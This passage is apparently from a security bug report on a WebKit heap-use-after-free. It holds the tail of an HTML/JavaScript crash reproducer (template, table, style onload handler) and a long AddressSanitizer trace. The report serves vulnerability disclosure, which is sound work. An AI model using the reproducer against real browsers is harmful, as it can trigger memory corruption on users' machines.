{\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\r\n```\r\n=================================================================\r\n\r\n### ASan log:\r\n```\r\n=================================================================\r\n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8\r\nREAD of size 8 at 0x60c0000b7070 thread T0\r\n==29516==WARNING: invalid path to external symbolizer!\r\n==29516==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)\r\n #1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)\r\n #2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n #24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)\r\n #25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)\r\n #26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)\r\n #27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)\r\n #28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)\r\n #29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)\r\n #30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)\r\n #31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)\r\n #32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)\r\n #33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)\r\n #34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)\r\n #35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)\r\nfreed by thread T0 here:\r\n #0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)\r\n #5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)\r\n #6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)\r\n #7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)\r\n #7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)\r\n #8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)\r\n #9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)\r\n #10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)\r\n #11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)\r\n #12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)\r\n #13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)\r\n #14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)\r\n #15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)\r\n #16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)\r\n #17 0x111eb7779 in 